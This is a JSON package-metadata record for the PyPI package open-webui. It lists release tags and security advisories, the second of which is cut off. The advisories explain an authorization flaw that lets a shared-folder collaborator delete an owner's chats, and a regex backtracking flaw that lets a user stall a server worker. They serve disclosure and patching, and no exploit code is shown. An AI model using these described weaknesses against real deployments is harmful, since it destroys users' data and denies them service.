1b","kind":"commit","published_at":"2024-07-09T21:25:16.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4900ac5136579c44c1be63f9b093fe8aff199910","kind":"commit","published_at":"2024-06-30T03:26:59.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"b0724811dfdb70883c112c20e05dda46707e0330","kind":"commit","published_at":"2024-06-27T20:38:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"9e4dd4b86f77653b59dc1fa97fe3f72e8252b359","kind":"commit","published_at":"2024-06-17T05:52:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"8f3c9b391be312c72c1a621135fd3cbe33fc0d15","kind":"commit","published_at":"2024-06-12T18:21:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"c41b33c9c0722c84055a833802611f8ee39609d3","kind":"commit","published_at":"2024-06-12T09:14:37.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"3933db2c91e635da52a28a9e7e2927f551b2fee6","kind":"commit","published_at":"2024-06-10T20:53:56.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"75d455ac8fc64f741607613c2277a02e28228a3c","kind":"commit","published_at":"2024-06-10T02:09:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"96a004d4d8289db1dea83a322f26ab01be3db3fc","kind":"commit","published_at":"2024-06-10T01:11:53.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.0/manifests"},{"name":"v0.2.5","sha":"dbb83f9824154480908e77fa4562d9fbe73a5de4","kind":"commit","published_at":"2024-06-05T17:06:11.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"f28877f4db2a136f26c495e033f1d2b4ea1b405c","kind":"commit","published_at":"2024-06-04T04:29:13.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"14646e84ea5e9d85fbb27a557ca14fb241cc373b","kind":"commit","published_at":"2024-06-03T20:06:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"5be97b81d61c571eb6758bf7b3d2ee85a09d2d02","kind":"commit","published_at":"2024-06-03T01:27:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"cfc78dedf0024ecb97a5090825af2698524c9d71","kind":"commit","published_at":"2024-06-02T21:08:43.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"72354e06a759075024d6be6bc6a8e717ec29d823","kind":"commit","published_at":"2024-06-02T05:03:02.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.0/manifests"},{"name":"v0.1.125","sha":"be5534c655f6cb3cc54c079de3f19d671e7a172b","kind":"commit","published_at":"2024-05-19T20:16:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.125","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.125","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.125","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.125","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.125/manifests"},{"name":"v0.1.124","sha":"b8d7fdf16e57deaf7faaa4dad7c2c5666e8b18ed","kind":"commit","published_at":"2024-05-08T17:54:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.124","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.124","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.124","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.124","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.124/manifests"},{"name":"v0.1.123","sha":"38ff3209ad2a57d8adb61cd597a7a5f55737ab25","kind":"commit","published_at":"2024-05-02T20:10:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.123","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.123","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.123","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.123","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.123/manifests"},{"name":"v0.1.122","sha":"92c98eda2e7340bc7c8f32d33bc49cec8498b1bb","kind":"commit","published_at":"2024-04-28T01:29:10.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.122","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.122","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.122","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.122","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.122/manifests"},{"name":"v0.1.121","sha":"748cb7d4460d38e73bb94260d2f78a98f56b7bf4","kind":"commit","published_at":"2024-04-24T19:31:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.121","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.121","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.121","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.121","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.121/manifests"},{"name":"v0.1.120","sha":"22c50f62cbbe9445bc8ea00695310ed740ad3789","kind":"commit","published_at":"2024-04-21T00:41:00.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.120","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.120","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.120","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.120","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.120/manifests"},{"name":"v0.1.119","sha":"851754700a4d4c90602c57564076521940d88fca","kind":"commit","published_at":"2024-04-16T22:12:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.119","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.119","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.119","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.119","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.119/manifests"},{"name":"v0.1.118","sha":"0399a69b73de9789c4221acedea70d528e1346c4","kind":"commit","published_at":"2024-04-10T22:41:12.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.118","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.118","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.118","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.118","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.118/manifests"},{"name":"v0.1.117","sha":"46774aa5cdbf4e894776978be60311210a6d0b32","kind":"commit","published_at":"2024-04-04T04:43:17.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.117","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.117","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.117","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.117","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.117/manifests"},{"name":"v0.1.116","sha":"3b0cb7945f5c9dbe55d5f76720ddf4e475c11169","kind":"commit","published_at":"2024-03-31T08:17:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.116","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.116","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.116","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.116","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.116/manifests"},{"name":"v0.1.115","sha":"ac294a74e7bc5f080970c049c656506e36f9407b","kind":"commit","published_at":"2024-03-24T23:20:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.115","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.115","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.115","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.115","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.115/manifests"},{"name":"v0.1.114","sha":"2fa94956f4e500bf5c42263124c758d8613ee05e","kind":"commit","published_at":"2024-03-21T02:34:22.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.114","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.114","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.114","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.114","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.114/manifests"},{"name":"v0.1.113","sha":"621719c6ac504e1c217fda3e445375a1d20802a3","kind":"commit","published_at":"2024-03-18T18:02:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.113","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.113","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.113","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.113","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.113/manifests"},{"name":"v0.1.112","sha":"5ce421e7faf79f8d7a28fd7cebe6fdc445c4146e","kind":"commit","published_at":"2024-03-15T20:49:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.112","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.112","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.112","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.112","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.112/manifests"},{"name":"v0.1.111","sha":"89634046e721c972eb24bd5115bd9eff77513d7a","kind":"commit","published_at":"2024-03-10T22:00:56.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.111","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.111","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.111","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.111","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.111/manifests"},{"name":"v0.1.110","sha":"8ed5759d0e9424f87d01fe3f8013116c4ba2004f","kind":"commit","published_at":"2024-03-07T04:32:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.110","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.110","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.110","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.110","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.110/manifests"},{"name":"v0.1.109","sha":"92e21acb4cfa8fb91c56df2903d7fc33448f7aae","kind":"commit","published_at":"2024-03-06T20:40:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.109","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.109","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.109","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.109","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.109/manifests"},{"name":"v0.1.108","sha":"eb51ad14e4caafda1c9fd24c4945044b8776a7a3","kind":"commit","published_at":"2024-03-03T03:25:17.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.108","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.108","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.108","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.108","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.108/manifests"},{"name":"v0.1.107","sha":"6c70d0f770ce4b0acf8d2a33eb7c0f27ffbed631","kind":"commit","published_at":"2024-03-02T07:05:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.107","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.107","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.107","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.107","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.107/manifests"},{"name":"v0.1.106","sha":"a181b2b63ba4f263e1683b087194e2f431960525","kind":"commit","published_at":"2024-02-28T04:11:43.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.106","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.106","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.106","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.106","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.106/manifests"},{"name":"v0.1.105","sha":"6df2505bf0352a7580b33f17ce6844afe04fb7be","kind":"commit","published_at":"2024-02-26T05:53:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.105","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.105","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.105","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.105","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.105/manifests"},{"name":"v0.1.104","sha":"3c10c3b928097035655e913eaf0e5dfc900f0f25","kind":"commit","published_at":"2024-02-25T21:05:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.104","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.104","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.104","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.104","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.104/manifests"},{"name":"v0.1.103","sha":"02fb517bbe0e40bf8a10df88d9c021f69ffe9ce3","kind":"commit","published_at":"2024-02-25T19:01:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.103","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.103","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.103","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.103","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.103/manifests"},{"name":"v0.1.102","sha":"4a47833f838088a0309edad2f85ff247b2ad6e00","kind":"commit","published_at":"2024-02-23T03:34:09.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.102","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.102","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.102","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.102","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.102/manifests"}]},"repo_metadata_updated_at":"2026-08-31T14:35:41.886Z","dependent_packages_count":0,"downloads":838765,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":61.56979978239499,"dependent_packages_count":10.934127253453868,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":36.25196351792443},"purl":"pkg:pypi/open-webui","advisories":[{"uuid":"GSA_kwCzR0hTQS0zY2c1LTQ4ajMtdjRnds4ABhS5","url":"https://github.com/advisories/GHSA-3cg5-48j3-v4gv","title":"Open WebUI: A folder write-collaborator can permanently delete the owner's chats by deleting a shared subfolder","description":"## Summary\nA user granted write access to a shared chat folder could permanently delete chats and messages belonging to the folder's owner. Deleting a folder cascades into the owner's chats and the entire subfolder subtree, and the deletion handler required only write access on subfolders instead of ownership. Root folders were restricted to the owner or an admin, subfolders were not.\n\n## Preconditions\nThe Folders Sharing permission (`user.permissions.sharing.folders`) must be enabled; it is off by default. The victim must have shared a folder with the attacker at write access. `features.folders` and the `chat.delete` permission are enabled by default and are both required. Deployments that leave folder sharing disabled are not affected, and neither are single-user instances.\n\n## Impact\nPermanent, irreversible destruction of another user's chat history within and beneath a shared folder. With `delete_contents=false` the same request instead force-moved the owner's chats out of the folder, an unauthorized relocation rather than a deletion. The write grant on the shared root folder is inherited by every descendant, so the attacker could destroy subfolders that were never explicitly shared with them. Nothing outside the shared folder's subtree is reachable, and no data is disclosed that write access did not already expose.\n\n## Fix\nFixed in 0.11.0 by https://github.com/open-webui/open-webui/pull/27003. Folder deletion is now restricted to the folder owner or an admin for root folders and subfolders alike, replacing the previous root/subfolder split with a single check. Upgrading fully resolves the issue; no configuration change is required. Owners and admins are unaffected, and a write-collaborator can still create, rename and add to shared folders and delete subfolders they own.\n\n## Root cause\nAffected component: `backend/open_webui/routers/folders.py`, the `DELETE /api/v1/folders/{id}` handler. Affected setup: any release from 0.10.0 onward that has folder sharing enabled.\n\nThe cascade that follows the authorization check is bound to the folder owner's id, not the caller's, so whoever passes the check deletes the owner's data. The check itself branched on whether the folder had a parent: root folders demanded ownership or admin, while subfolders accepted any write grant. Because write grants propagate down the folder tree, that branch handed every collaborator deletion rights over the owner's subtree, which is broader than what the sharing model grants write access.\n\n## Credits\n@legobattman, who reported the issue and its remediation.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-08-04T20:58:12.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-3cg5-48j3-v4gv","https://github.com/open-webui/open-webui/pull/27003","https://github.com/open-webui/open-webui/commit/915ef7d0798d3175819cedbb2f62d7bf0db78c98","https://github.com/open-webui/open-webui/releases/tag/v0.11.0","https://github.com/advisories/GHSA-3cg5-48j3-v4gv"],"source_kind":"github","identifiers":["GHSA-3cg5-48j3-v4gv","CVE-2026-70494"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-04T21:00:21.477Z","updated_at":"2026-09-03T03:00:45.094Z","epss_percentage":0.00297,"epss_percentile":0.2195,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zY2c1LTQ4ajMtdjRnds4ABhS5","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zY2c1LTQ4ajMtdjRnds4ABhS5","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003e= 0.10.0, \u003c 0.11.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zY2c1LTQ4ajMtdjRnds4ABhS5/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yZjU0LXAyNDQtMzJxNs4ABhS4","url":"https://github.com/advisories/GHSA-2f54-p244-32q6","title":"Open WebUI: Any authenticated user can stall a worker via a knowledge-search pattern that backtracks catastrophically","description":"## Summary\nThe built-in knowledge search tools let a chat participant choose the pattern used to grep knowledge files. Patterns containing regex metacharacters were compiled with Python's backtracking `re` engine and run against every line of every reachable file, with no time limit anywhere on that path. A single crafted pattern and a single short line of matching text pin one CPU core for as long as the attacker wants, and because the search runs synchronously inside the event loop, that worker serves nobody else while it spins.\n\n## Preconditions\n- Default configuration. The knowledge builtin tool group is enabled by default, and with `ENABLE_KB_EXEC` at its default of `False` the model is handed `grep_knowledge_files`, which is the affected path.\n- Any authenticated user, no elevated role and no workspace 